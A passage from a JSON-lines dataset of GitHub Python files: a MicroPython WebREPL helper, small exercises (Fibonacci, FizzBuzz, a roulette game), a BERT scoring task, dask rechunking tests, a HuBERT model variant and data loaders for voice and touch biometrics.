WebREPL().listen_s.bind(addr)\n WebREPL().listen_s.listen(1)\n if accept_handler:\n WebREPL().listen_s.setsockopt(socket.SOL_SOCKET, 20, accept_handler)\n for i in (network.AP_IF, network.STA_IF):\n iface = network.WLAN(i)\n if iface.active():\n print(rainbow(\"WebREPL daemon started on ws://%s:%d\" % (iface.ifconfig()[0], port), color='green'))\n return WebREPL().listen_s\n\n @classmethod\n def accept_conn(cls,listen_sock):\n\n cl, remote_addr = listen_sock.accept()\n prev = uos.dupterm(None)\n uos.dupterm(prev)\n if prev:\n print(\"\\nConcurrent WebREPL connection from\", remote_addr, \"rejected\")\n cl.close()\n return\n print(\"\\nWebREPL connection from:\", remote_addr)\n WebREPL().client_s = cl\n websocket_helper.server_handshake(cl)\n WebREPL().ws = websocket.websocket(cl, True)\n\n WebREPL().wr = _webrepl._webrepl(WebREPL().ws)\n type(WebREPL().wr)\n cl.setblocking(False)\n # notify REPL on socket incoming data\n cl.setsockopt(socket.SOL_SOCKET, 20, uos.dupterm_notify)\n uos.dupterm(WebREPL().wr)\n \n\n @classmethod\n def stop(cls):\n uos.dupterm(None)\n if WebREPL().client_s:\n WebREPL().client_s.close()\n if WebREPL().listen_s:\n WebREPL().listen_s.close()\n\n @classmethod\n def start(cls,port=8266, password=None):\n WebREPL().stop()\n if password is None:\n try:\n import webrepl_cfg\n _webrepl.password(webrepl_cfg.PASS)\n WebREPL().setup_conn(port, WebREPL().accept_conn)\n print(\"Started webrepl in normal mode\")\n except:\n print(\"WebREPL is not configured, run 'import webrepl_setup'\")\n else:\n _webrepl.password(password)\n WebREPL().setup_conn(port, WebREPL().accept_conn)\n print(rainbow(\"WebREPL started.\", color='green'))\n\n @classmethod\n def start_foreground(cls,port=8266):\n WebREPL().stop()\n s = WebREPL().setup_conn(port, None)\n WebREPL().accept_conn(s)\n\n\n\ndef emp_sender(func):\n def wrapper(*args, **kwargs): \n rsp = dict(func=func.__name__, data=func(*args, **kwargs))\n WebREPL.send(json.dumps(rsp) + '\\n\\r')\n gc.collect()\n return wrapper\n","repo_name":"1zlab/EMP","sub_path":"emp_webrepl.py","file_name":"emp_webrepl.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"54"} +{"seq_id":"28653052875","text":"'''https://school.programmers.co.kr/learn/courses/30/lessons/12945'''\ndef solution(n):\n a = 0\n b = 1\n if n == 0 :\n answer = 0\n if n == 1 :\n answer = 1\n if n > 1 :\n for x in range(1, n) :\n c = a%1234567 + b%1234567\n answer = c\n a = b\n b = c\n return answer%1234567","repo_name":"mychu-lab/algorithm-study","sub_path":"programmers/lv2_피보나치수.py","file_name":"lv2_피보나치수.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"32488879827","text":"import utils\nimport csv\nimport os\nimport CalculationFunctions as clf\nimport InOutFunctions as iof\n\nsamples, settings = utils.loadSettings()\ntxt2 = open(\"fail.txt\", \"a\")\nfor s in samples:\n G_primitive, S_bounds, primitive_only, ConstraintType, constraint, loop_free, _, out_path, _, timestep, \\\n bio_flag, height, DAG, height2, attempt_range, ub = utils.loadData(s, settings)\n file = open(f\"RunTime.csv\", \"a\", newline=\"\")\n writer = csv.writer(file)\n if file.tell() == 0:\n writer.writerow([\"Benchmark\", \"AttemptRange\", \"RunTime\"])\n path = f\"{out_path}/sol_after_merge_{S_bounds[1]}_{constraint[0]}_{attempt_range}.txt\"\n if not os.path.isfile(path):\n txt2.write(f\"{s},\")\n continue\n with open(path) as f:\n for line in f:\n if \"Time\" in line:\n line = line.split(\":\")[1]\n line = line.replace(\" \", \"\")\n line = line.replace(\"s\", \"\")\n line = line.replace(\"\\n\", \"\")\n writer.writerow([s, attempt_range, line])\n\n\n\n # li = [4]\n # for i in li:\n # MergeResult, TotalComm = iof.loadSolution(f\"{out_path}/sol_after_merge_{S_bounds[1]}_{constraint[0]}_{attempt_range}_{i}.txt\")\n # CellToCellEdges = clf.calculateCellEdges(G_primitive, MergeResult)\n # print(i, TotalComm, CellToCellEdges)\n\n\n\n","repo_name":"zyrrron/Oriole_old","sub_path":"algorithm/calculateResultInfo.py","file_name":"calculateResultInfo.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27741465738","text":"import logging\nfrom celery import shared_task\nfrom celery.utils.log import get_logger\nfrom app import crud\nfrom app.db.session import SessionLocal\nfrom app.schemas.article import ArticleUpdate\nimport pickle\nimport torch\nfrom transformers import BertForSequenceClassification, BertTokenizer\nfrom app.tasks.BERT_1_1 import convert_examples_to_inputs, get_data_loader\n\nMODEL_FP = r\"/model_resources/BERT_1_1.bin\"\n\nclass BERT_infer(object):\n def __init__(self, model_fp, batch_size=10):\n self.BERT_MODEL = \"bert-base-uncased\"\n self.label2idx = {False: 0, True: 1}\n self.model_fp = model_fp\n self.model_state_dict = torch.load(\n self.model_fp, map_location=lambda storage, loc: storage\n )\n self.model = BertForSequenceClassification.from_pretrained(\n self.BERT_MODEL, state_dict=self.model_state_dict, num_labels=2\n )\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n self.max_seq_length = 500\n self.model.to(self.device)\n self.tokenizer = BertTokenizer.from_pretrained(\"bert-base-uncased\", model_max_length=self.max_seq_length, truncation_side='right')\n # self.tokenizer.model_max_length = 500\n self.batch_size = batch_size\n\n def score(self, txt):\n input_ids = (\n torch.tensor(self.tokenizer.encode(txt, max_length=self.max_seq_length)).unsqueeze(0).to(self.device)\n ) # batch size 1\n output = self.model(input_ids)\n score = round(output.logits.softmax(dim=-1).tolist()[0][1] * 100, 5)\n return score\n\nbert_infer = BERT_infer(model_fp=MODEL_FP)\n\n\n\n@shared_task(\n name=\"infer:job_score\",\n bind=True,\n default_retry_delay=30,\n max_retries=3,\n soft_time_limit=10000,\n)\ndef job_ct_score(self, job_id):\n db = SessionLocal()\n job = crud.job.get(db=db, id=job_id)\n\n for article in job.article_set:\n if article.text:\n score = bert_infer.score(article.text)\n article_update = ArticleUpdate(score=score)\n crud.article.update(db=db, db_obj=article, obj_in=article_update)\n\n db.close()\n return job_id\n","repo_name":"bitem-heg-geneve/CellTriage-api","sub_path":"backend/app/app/tasks/ct_score.py","file_name":"ct_score.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6280791001","text":"class Solution:\n def fizzBuzz(self, n):\n \"\"\"\n :type n: int\n :rtype: List[str]\n \"\"\"\n # ans list\n ans = []\n\n for num in range(1,n+1):\n\n divisible_by_3 = (num % 3 == 0)\n divisible_by_5 = (num % 5 == 0)\n\n num_ans_str = \"\"\n\n if divisible_by_3:\n # Divides by 3\n num_ans_str += \"Fizz\"\n if divisible_by_5:\n # Divides by 5\n num_ans_str += \"Buzz\"\n if not num_ans_str:\n # Not divisible by 3 or 5\n num_ans_str = str(num)\n\n # Append the current answer str to the ans list\n ans.append(num_ans_str)\n\n return ans","repo_name":"DivyaGodayal/CoderChef-Kitchen","sub_path":"Adhoc/Fizz-Buzz/solution_string_concat.py","file_name":"solution_string_concat.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":367,"dataset":"github-code","pt":"54"} +{"seq_id":"27048446295","text":"import random\r\n\r\nmise = -1\r\nnumero = -1\r\nroulette = range(49)\r\nresult = random.randint(0, 49)\r\n\r\nwhile int(mise) < 0 :\r\n mise = input(\"Veuillez saisir une somme à miser : \")\r\nwhile int(numero) < 0 or int(numero) > 49 :\r\n numero = input(\"Veuillez saisir une valeur enter 0 et 49 : \")\r\n\r\nprint(f\"Vous avez misé {mise} euros sur le {numero}\" )\r\nprint(f\"Le numéro gagnant est : {result}\")\r\n\r\nnumero = int(numero)\r\nmise = int(mise)\r\n\r\nif numero == result :\r\n gain = mise*3\r\n print(f\"Vous avez gagné {gain} euros !!\")\r\nelif (numero % 2) == 0 and (result % 2) == 0 :\r\n gain = mise/2\r\n print(f\"Vous avez gagné {gain} euros !!\")\r\nelif (numero % 2) != 0 and (result % 2) != 0 :\r\n gain = mise/2\r\n print(f\"Vous avez gagné {gain} euros !!\")\r\nelse :\r\n print(\"Vous avez perdu voter mise !\")\r\n","repo_name":"SylvainDecombe/python","sub_path":"bonus01.py","file_name":"bonus01.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74796947040","text":"import matplotlib.pyplot as plt\nimport random\n\ny=[random.randint(20,80) for i in range(20)]\nx=range(1,21)\nplt.figure(figsize=(15,6),dpi=80)\n\n\n#plt.bar(range(len(x)),y,width=0.8)\nplt.barh(range(len(x)),y,height=0.5,color='orange')\n#plt.xticks(range(len(x)),x)\nplt.yticks(range(len(x)),x)\nplt.grid(alpha=0.5)\nplt.show()","repo_name":"xuefliang/Python-learn","sub_path":"bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43067366759","text":"from itertools import chain\n\nimport dask.array as da\nimport numpy as np\nimport pytest\nfrom dask import delayed\n\nfrom pymcac.tools.core.dask_tools import aligned_rechunk, not_aligned_rechunk\nfrom pymcac.tools.core.sorting import sortby\n\nfrom .generator import generate_dummy_aggregates_data\nfrom .test_data import check_dask_consistency, check_data\n\n\ndef identical(ds1, ds2):\n \"\"\"Check identity of values and chunks.\"\"\"\n if not ds1.identical(ds2):\n return False\n if not ds1.chunks == ds2.chunks:\n return False\n return True\n\n\ndef check_chunks(chunks, target):\n \"\"\"Check if correctly chunks.\"\"\"\n assert max(chunks) == target\n assert min(chunks) > 0\n assert target in chunks\n\n\n@pytest.mark.parametrize(\"dask\", [0, 1, 2])\ndef test_not_aligned_rechunk_no_change(dask):\n \"\"\"Check not_aligned_rechunk with same chunks.\"\"\"\n data = generate_dummy_aggregates_data(dask=dask)\n\n no_change = not_aligned_rechunk(data, chunks=data.chunks)\n assert identical(data, no_change)\n\n\n@pytest.mark.parametrize(\"dask\", [0, 1, 2])\n@pytest.mark.parametrize(\"dim\", [\"k\", \"Time\", \"Label\"])\ndef test_not_aligned_rechunk_one_chunk(dask, dim):\n \"\"\"Check not_aligned_rechunk with one chunks.\"\"\"\n data = generate_dummy_aggregates_data(dask=dask)\n\n one_chunked = not_aligned_rechunk(data, chunks={dim: 3})\n\n assert identical(data.compute(), one_chunked.compute())\n assert identical(one_chunked, one_chunked.unify_chunks())\n assert set(one_chunked.chunks) == {dim} | set(data.chunks)\n check_chunks(one_chunked.chunks[dim], 3)\n check_data(one_chunked, aligned=False)\n\n\n@pytest.mark.parametrize(\"dask\", [0, 1, 2])\n@pytest.mark.parametrize(\"dims\", [(\"k\", \"Time\"), (\"Time\", \"Label\")])\ndef test_not_aligned_rechunk_two_chunk(dask, dims):\n \"\"\"Check not_aligned_rechunk with two chunks in one call.\"\"\"\n data = generate_dummy_aggregates_data(nt=5, dask=dask)\n\n chunks = dict(zip(dims, (3, 4)))\n two_chunked = not_aligned_rechunk(data, chunks=chunks)\n\n assert identical(data.compute(), two_chunked.compute())\n assert identical(two_chunked, two_chunked.unify_chunks())\n assert set(two_chunked.chunks) == set(dims) | set(data.chunks)\n for dim, n in chunks.items():\n check_chunks(two_chunked.chunks[dim], n)\n check_data(two_chunked, aligned=False)\n\n\n@pytest.mark.parametrize(\"dask\", [0, 1, 2])\n@pytest.mark.parametrize(\"dims\", [(\"k\", \"Time\"), (\"Time\", \"Label\")])\ndef test_not_aligned_rechunk_two_chunk_seq(dask, dims):\n \"\"\"Check not_aligned_rechunk with two chunks in two calls.\"\"\"\n data = generate_dummy_aggregates_data(nt=5, dask=dask)\n\n chunks = dict(zip(dims, (3, 4)))\n two_chunked = not_aligned_rechunk(data, chunks=chunks)\n chunk0, chunk1 = ({dim: n} for dim, n in chunks.items())\n two_chunked_seq = not_aligned_rechunk(not_aligned_rechunk(data, chunks=chunk0), chunks=chunk1)\n assert identical(two_chunked, two_chunked_seq)\n two_chunked_seq = not_aligned_rechunk(not_aligned_rechunk(data, chunks=chunk1), chunks=chunk0)\n assert identical(two_chunked, two_chunked_seq)\n check_data(two_chunked_seq, aligned=False)\n\n\ndef test_not_aligned_rechunk_multi():\n \"\"\"Check not_aligned_rechunk with multiple chunks.\"\"\"\n data = generate_dummy_aggregates_data(nt=5)\n\n multi_chunk = data.copy()\n for i, var in enumerate(chain(multi_chunk.values(), multi_chunk.coords.values())):\n if i == 0:\n continue\n if \"k\" in var.dims:\n var.data = da.from_array(var.data, chunks=i + 1)\n assert identical(data, multi_chunk.compute())\n\n rechunked = not_aligned_rechunk(multi_chunk, k=3)\n\n assert identical(data, rechunked.compute())\n assert set(rechunked.chunks) == {\"k\"}\n check_chunks(rechunked.chunks[\"k\"], 3)\n assert identical(rechunked, rechunked.unify_chunks())\n check_data(rechunked, aligned=False)\n\n\ndef test_not_aligned_rechunk_no_compute():\n \"\"\"Check not_aligned_rechunk is lazy.\"\"\"\n data = generate_dummy_aggregates_data()\n\n data[\"trigger\"] = (\"k\",), da.from_delayed(\n raise_if_computed(), dtype=int, shape=(data.sizes[\"k\"],)\n )\n not_aligned_rechunk(data, chunks={\"k\": 3})\n\n\n@pytest.mark.parametrize(\"dask\", [1, 2])\ndef test_aligned_rechunk_idempotent(dask):\n \"\"\"Check aligned_rechunk with already aligned chunks.\"\"\"\n data = generate_dummy_aggregates_data(sort_info=True, dask=dask)\n rechunked = aligned_rechunk(data, Time=max(data.chunks[\"Time\"]))\n assert identical(data, rechunked)\n check_data(rechunked)\n\n\n@pytest.mark.parametrize(\"dask\", [1, 2])\ndef test_aligned_rechunk_infer_on(dask):\n \"\"\"Check aligned_rechunk `on` inference`.\"\"\"\n data = generate_dummy_aggregates_data(sort_info=True, dask=dask)\n rechunked = aligned_rechunk(data)\n assert identical(data, rechunked)\n check_data(rechunked)\n\n\n@pytest.mark.parametrize(\"dask\", [0, 5])\ndef test_aligned_rechunk_time(dask):\n \"\"\"Check aligned_rechunk on time.\"\"\"\n data_unchunked = generate_dummy_aggregates_data(sort_info=True, dask=dask)\n data_chunked = aligned_rechunk(data_unchunked, Time=2)\n assert identical(data_unchunked.compute(), data_chunked.compute())\n assert set(data_chunked.chunks) == {\"k\", \"Time\"}\n check_chunks(data_chunked.chunks[\"Time\"], 2)\n check_data(data_chunked)\n\n\n@pytest.mark.parametrize(\"dask\", [0, 5])\ndef test_aligned_rechunk_label(dask):\n \"\"\"Check aligned_rechunk on label.\"\"\"\n data_unchunked = sortby(generate_dummy_aggregates_data(dask=dask), \"Label\")\n check_data(data_unchunked)\n data_chunked = aligned_rechunk(data_unchunked, Label=2)\n assert identical(data_unchunked.compute(), data_chunked.compute())\n assert set(data_chunked.chunks) == {\"k\", \"Label\"}\n check_chunks(data_chunked.chunks[\"Label\"], 2)\n check_data(data_chunked)\n\n\n@pytest.mark.parametrize(\"dask\", [0, 5])\ndef test_aligned_rechunk_other(dask):\n \"\"\"Check aligned_rechunk on random data.\"\"\"\n aggregates = generate_dummy_aggregates_data(dask=dask)\n if dask:\n chunks = aggregates.chunks\n aggregates[\"Np\"] = (\"k\",), np.random.randint(1, 10, aggregates.sizes[\"k\"])\n if dask:\n aggregates = not_aligned_rechunk(aggregates, chunks=chunks)\n\n data_unchunked = sortby(aggregates, \"Np\")\n\n data_chunked = aligned_rechunk(data_unchunked, Np=2)\n\n assert identical(data_unchunked.compute(), data_chunked.compute())\n assert set(data_chunked.chunks) == {\"k\"}\n\n limits_inf = da.map_blocks(\n lambda Np: np.array([Np.min()]), data_chunked[\"Np\"].data, dtype=int\n ).compute()\n limits_sup = da.map_blocks(\n lambda Np: np.array([Np.max()]), data_chunked[\"Np\"].data, dtype=int\n ).compute()\n assert np.all(limits_inf[1:] > limits_inf[:-1])\n assert np.all(limits_sup[1:] > limits_sup[:-1])\n assert np.all(limits_sup >= limits_inf)\n\n check_data(data_chunked)\n\n\ndef test_aligned_rechunk_args():\n \"\"\"Check aligned_rechunk args parsing.\"\"\"\n data_unchunked = generate_dummy_aggregates_data()\n data_chunked = aligned_rechunk(data_unchunked, Time=2)\n data_chunked2 = aligned_rechunk(data_unchunked, \"Time\", Time=2)\n assert identical(data_chunked, data_chunked2)\n\n data_chunked2 = aligned_rechunk(data_unchunked, Time=data_chunked.chunks[\"Time\"])\n assert identical(data_chunked, data_chunked2)\n\n data_chunked2 = aligned_rechunk(not_aligned_rechunk(data_unchunked, Time=2), Time=None)\n assert identical(data_chunked, data_chunked2)\n\n\ndef test_aligned_rechunk_mixed():\n \"\"\"test_aligned_rechunk_mixed.\"\"\"\n data_unchunked = generate_dummy_aggregates_data()\n\n k_chunked = aligned_rechunk(data_unchunked, \"Time\", k=3)\n check_dask_consistency(k_chunked)\n\n mixed = not_aligned_rechunk(data_unchunked, k=k_chunked.chunks[\"k\"])\n k_chunked2 = aligned_rechunk(mixed, \"Time\", k=None)\n assert identical(k_chunked2, k_chunked)\n\n\ndef test_aligned_rechunk_no_compute():\n \"\"\"Check aligned_rechunk lazy.\"\"\"\n data = generate_dummy_aggregates_data()\n\n data[\"trigger\"] = (\"k\",), da.from_delayed(\n raise_if_computed(), dtype=int, shape=(data.sizes[\"k\"],)\n )\n aligned_rechunk(data, Time=2)\n\n\n@delayed\ndef raise_if_computed():\n \"\"\"Raise if called.\"\"\"\n raise ValueError(\"I should never be computed\")\n","repo_name":"giraldeau/MCAC","sub_path":"pymcac/tests/test_dask.py","file_name":"test_dask.py","file_ext":"py","file_size_in_byte":8181,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"37882512751","text":"import logging\nfrom typing import Dict, List, Optional, Tuple\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nfrom dataclasses import dataclass, field\nfrom fairseq import utils\nfrom fairseq.data.dictionary import Dictionary\nfrom fairseq.models import BaseFairseqModel, register_model\nfrom fairseq.models.hubert import HubertConfig, HubertModel\nfrom fairseq.modules import GradMultiply, LayerNorm\nfrom fairseq.tasks.hubert_pretraining import (\n HubertPretrainingConfig,\n HubertPretrainingTask,\n)\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass ILSHubertConfig(HubertConfig):\n #relative position embedding\n relative_position_embedding: bool = field(\n default=False,\n metadata={\"help\": \"whether to use the relative position embedding, (bucket relpos embedding by default)\"}\n )\n num_buckets: int = field(\n default=320,\n metadata={\"help\": \"the number of buckets for relative position embedding\"}\n )\n max_distance: int = field(\n default=800,\n metadata={\"help\": \"the maximum distance for computing relative bias, beyond which will assign the same embedding\"}\n )\n\n # ILS-SSL params\n weighted_sum: bool = field(\n default=False\n )\n predict_layers: str = field(\n default=\"[12]\"\n )\n separate_label_embeds: bool = field(\n default=False\n )\n separate_layer_targets: bool = field(\n default=False\n )\n\n\n@register_model(\"ils_hubert\", dataclass=ILSHubertConfig)\nclass ILSHubertModel(HubertModel):\n def __init__(\n self,\n cfg: ILSHubertConfig,\n task_cfg: HubertPretrainingConfig,\n dictionaries: List[Dictionary],\n ) -> None:\n super().__init__(cfg, task_cfg, dictionaries)\n logger.info(f\"HubertModel Config: {cfg}\")\n\n self.predict_layers = eval(cfg.predict_layers)\n self.separate_label_embeds = cfg.separate_label_embeds\n self.separate_layer_targets = cfg.separate_layer_targets\n self.weighted_sum = cfg.weighted_sum\n\n self.layer_norm_first = cfg.layer_norm_first\n if self.layer_norm_first:\n self.post_layer_norm = torch.nn.Sequential(*[LayerNorm(cfg.encoder_embed_dim) for _ in range(len(self.predict_layers))])\n\n if self.separate_label_embeds:\n if self.separate_layer_targets or not self.untie_final_proj:\n self.final_proj = torch.nn.Sequential(*[nn.Linear(\n cfg.encoder_embed_dim, cfg.final_dim)\n for _ in range(len(self.predict_layers))])\n else:\n self.final_proj = torch.nn.Sequential(*[nn.Linear(\n cfg.encoder_embed_dim, cfg.final_dim * len(dictionaries))\n for _ in range(len(self.predict_layers))])\n else:\n if self.separate_layer_targets or not self.untie_final_proj:\n self.final_proj = nn.Linear(cfg.encoder_embed_dim, cfg.final_dim)\n else:\n self.final_proj = nn.Linear(cfg.encoder_embed_dim, cfg.final_dim * len(dictionaries))\n\n if self.weighted_sum:\n self.weights = nn.Parameter(torch.zeros(len(self.predict_layers)))\n # modules below are not needed during fine-tuning\n if any([d is None for d in dictionaries]):\n logger.info(\n \"cannot find dictionary. assume will be used for fine-tuning\"\n )\n else:\n self.num_classes = [len(d) for d in dictionaries]\n layer_dim = len(self.predict_layers) if self.separate_layer_targets or self.separate_label_embeds else 1\n embed_dim = sum(self.num_classes) if not self.separate_layer_targets else max(self.num_classes)\n self.label_embs_concat = nn.Parameter(\n torch.FloatTensor(layer_dim, embed_dim, cfg.final_dim)\n )\n nn.init.uniform_(self.label_embs_concat)\n\n @classmethod\n def build_model(cls, cfg: ILSHubertConfig, task: HubertPretrainingTask):\n \"\"\"Build a new model instance.\"\"\"\n\n model = ILSHubertModel(cfg, task.cfg, task.dictionaries)\n return model\n\n def forward(\n self,\n source: torch.Tensor,\n target_list: Optional[List[torch.Tensor]] = None,\n padding_mask: Optional[torch.Tensor] = None,\n mask: bool = True,\n features_only: bool = False,\n output_layer: Optional[int] = None,\n ) -> Dict[str, torch.Tensor]:\n \"\"\"output layer is 1-based\"\"\"\n if self.feature_grad_mult > 0:\n features = self.feature_extractor(source)\n if self.feature_grad_mult != 1.0:\n features = GradMultiply.apply(features, self.feature_grad_mult)\n else:\n with torch.no_grad():\n features = self.feature_extractor(source)\n if target_list is not None:\n features, target_list = self.forward_targets(features, target_list)\n\n features_pen = features.float().pow(2).mean()\n\n features = features.transpose(1, 2)\n features = self.layer_norm(features)\n unmasked_features = features.clone()\n\n if padding_mask is not None:\n padding_mask = self.forward_padding_mask(features, padding_mask)\n\n\n if self.post_extract_proj is not None:\n features = self.post_extract_proj(features)\n\n\n features = self.dropout_input(features)\n unmasked_features = self.dropout_features(unmasked_features)\n\n if mask:\n x, mask_indices = self.apply_mask(\n features, padding_mask, target_list\n )\n else:\n x = features\n mask_indices = None\n\n # feature: (B, T, D), float\n # target: (B, T), long\n # x: (B, T, D), float\n # padding_mask: (B, T), bool\n # mask_indices: (B, T), bool\n\n x, layer_results = self.encoder(\n x,\n padding_mask=padding_mask,\n layer=self.predict_layers\n )\n\n result = {\"x\": x, \"padding_mask\": padding_mask, \"features\": features, \"layer_results\": layer_results}\n\n if features_only:\n if self.layer_norm_first and output_layer is not None:\n result['x'] = self.post_layer_norm[-1](x)\n return result\n\n layer_results = [layer_x.transpose(0, 1) for i, (layer_x, _) in enumerate(layer_results)]\n\n if not (x == layer_results[-1]).all():\n print(\"{} {} {} {}\".format((x == layer_results[-1]).shape, (x == layer_results[-1]).float().sum(),\n (x - layer_results[-1]).float().sum(), (x - layer_results[-1]).float().abs().max(),))\n\n if self.layer_norm_first:\n layer_results = [layernorm(x) for x, layernorm in zip(layer_results, self.post_layer_norm)]\n\n def compute_pred(proj_x, target, label_embs):\n # compute logits for the i-th label set\n y = torch.index_select(label_embs, 0, target.long())\n negs = label_embs.unsqueeze(1).expand(-1, proj_x.size(0), -1)\n if self.target_glu:\n y = self.target_glu(y)\n negs = self.target_glu(negs)\n # proj_x: (S, D)\n # y: (S, D)\n # negs: (Neg, S, D)\n return self.compute_nce(proj_x, y, negs)\n\n\n logit_m_list = []\n logit_u_list = []\n proj_x_m_list = []\n proj_x_u_list = []\n\n if self.separate_layer_targets:\n assert len(layer_results) == len(self.final_proj)\n assert len(layer_results) == len(self.label_embs_concat)\n\n for i, layer_x in enumerate(layer_results): #, final_proj, label_embs in zip(layer_results, self.final_proj, label_embs_concat):\n if self.separate_label_embeds:\n final_proj = self.final_proj[i]\n else:\n final_proj = self.final_proj\n\n if self.separate_label_embeds or self.separate_layer_targets:\n label_embs = self.label_embs_concat[i]\n else:\n label_embs = self.label_embs_concat[0]\n\n if not self.separate_layer_targets:\n label_embs_list = label_embs.split(self.num_classes, 0)\n else:\n label_embs_list = [label_embs[:self.num_classes[i]]]\n\n if not self.skip_masked:\n masked_indices = torch.logical_and(~padding_mask, mask_indices)\n proj_x_m = final_proj(layer_x[masked_indices])\n\n if self.separate_layer_targets:\n proj_x_m_list = [proj_x_m]\n logit_m_list += [\n compute_pred(proj_x_m, target_list[i][masked_indices], label_embs_list[0])\n ]\n else:\n if self.untie_final_proj:\n proj_x_m_list = proj_x_m.chunk(len(target_list), dim=-1)\n else:\n proj_x_m_list = [proj_x_m for _ in range(len(target_list))]\n logit_m_list += [\n compute_pred(proj_x_m, t[masked_indices], label_embs_list[i])\n for i, (proj_x_m, t) in enumerate(\n zip(proj_x_m_list, target_list)\n )\n ]\n else:\n logit_m_list += [None for _ in target_list]\n\n if not self.skip_nomask:\n nomask_indices = torch.logical_and(~padding_mask, ~mask_indices)\n proj_x_u = final_proj(layer_x[nomask_indices])\n if self.separate_layer_targets:\n proj_x_u_list = [proj_x_u]\n logit_u_list += [\n compute_pred(proj_x_u, target_list[i][nomask_indices], label_embs_list[0])\n ]\n else:\n if self.untie_final_proj:\n proj_x_u_list = proj_x_u.chunk(len(target_list), dim=-1)\n else:\n proj_x_u_list = [proj_x_u for _ in range(len(target_list))]\n logit_u_list += [\n compute_pred(proj_x_u, t[nomask_indices], label_embs_list[i])\n for i, (proj_x_u, t) in enumerate(\n zip(proj_x_u_list, target_list)\n )\n ]\n else:\n logit_u_list += [None for _ in target_list]\n\n result[\"logit_m_list\"] = logit_m_list\n result[\"logit_u_list\"] = logit_u_list\n result[\"padding_mask\"] = padding_mask\n result[\"features_pen\"] = features_pen\n return result\n\n def extract_features(\n self,\n source: torch.Tensor,\n padding_mask: Optional[torch.Tensor] = None,\n mask: bool = False,\n ret_conv: bool = False,\n output_layer: Optional[int] = None,\n ret_layer_results: bool = False,\n ) -> Tuple[torch.Tensor, torch.Tensor]:\n res = self.forward(\n source,\n padding_mask=padding_mask,\n mask=mask,\n features_only=True,\n output_layer=output_layer,\n )\n feature = res[\"features\"] if ret_conv else res[\"x\"]\n if ret_layer_results:\n return (feature, res[\"layer_results\"]), res[\"padding_mask\"]\n return feature, res[\"padding_mask\"]\n\n def get_logits(self, net_output, is_masked=True):\n if is_masked:\n logits_list = net_output[\"logit_m_list\"]\n else:\n logits_list = net_output[\"logit_u_list\"]\n logits_list = [x.float() for x in logits_list if x is not None]\n return logits_list\n\n def get_targets(self, net_output, is_masked=True):\n logits_list = self.get_logits(net_output, is_masked)\n targets_list = [\n x.new_zeros(x.size(0), dtype=torch.long) for x in logits_list\n ]\n return targets_list\n\n def get_extra_losses(self, net_output):\n extra_losses = []\n names = []\n\n if \"features_pen\" in net_output:\n extra_losses.append(net_output[\"features_pen\"])\n names.append(\"features_pen\")\n\n return extra_losses, names\n\n def remove_pretraining_modules(self):\n self.target_glu = None\n self.final_proj = None\n self.label_embs_concat = None\n","repo_name":"microsoft/UniSpeech","sub_path":"src/fairseq/models/hubert/ils_hubert.py","file_name":"ils_hubert.py","file_ext":"py","file_size_in_byte":12217,"program_lang":"python","lang":"en","doc_type":"code","stars":355,"dataset":"github-code","pt":"54"} +{"seq_id":"24186076536","text":"from torch.utils.data import Dataset\r\nimport torch\r\nimport numpy as np\r\nimport os\r\nfrom scipy.io import wavfile\r\nimport sounddevice as sd\r\n\r\nclass VoiceData(Dataset):\r\n\r\n def __init__(self):\r\n\r\n self.data_dir = './recordings/'\r\n self.file_paths = [f for f in os.listdir(self.data_dir) if os.path.isfile(os.path.join(self.data_dir, f))]\r\n\r\n def __len__(self):\r\n return len(self.file_paths)\r\n\r\n def __getitem__(self,idx):\r\n fp = self.file_paths[idx]\r\n\r\n # get y\r\n\r\n y = int(fp[0])\r\n\r\n # \r\n self.fs, wv = wavfile.read(self.data_dir+fp)\r\n assert self.fs==8000\r\n wv = wv[:12000]\r\n x=np.zeros((12000), dtype=np.float32)\r\n x[:len(wv)] = wv\r\n x = x/np.max(x)\r\n x = torch.tensor(x, dtype=torch.float)\r\n y = torch.tensor(y, dtype=torch.long)\r\n return (x,y)\r\n \r\n \r\n def play(self, idx):\r\n x, y = self.__getitem__(idx)\r\n sd.play(x, self.fs, blocking=True)\r\n print(y)\r\n \r\n\r\n","repo_name":"Eric-D-Stevens/multi_GPU_DataParallel_Tasks","sub_path":"voice_dataset.py","file_name":"voice_dataset.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"13419741647","text":"from dataset.dim_red_pca_operation import PcaDimRed\nfrom dataset.min_max_scaling_operation import MinMaxScaling\nfrom dataset.standard_scaling_operation import StandardScaling\nfrom dataset.biometric_dataset import BioDataSet\nfrom external_dataset_parsers import hmog_parser\n\n\"\"\"\nExample of feature generation from feature data for touch biometric data and preforming feature scaling and feature \nreduction\n\"\"\"\n\n''' \n Read the feature data from disk and generate features\n'''\n\nraw_bio_data = 'C:\\\\Users\\\\esi\\\\Documents\\\\WD\\\\data-sufficiency_uniqueness\\\\SecurityMetrics\\\\processed_data\\\\hmog_touch\\\\df_10.csv'\n\ntb_data = BioDataSet(feature_data_path=raw_bio_data)\n\n''' \n Read the feature dataframe and generate features\n'''\n\nhmog_in = 'C:\\\\wd\\\\research\\\\data-sufficiency_uniqueness\\\\SecurityMetrics\\\\raw_data\\\\hmog_dataset\\\\public_dataset'\ndf = hmog_parser.HMOGParser().raw_to_feature_vectors(hmog_in)\ntb_data = 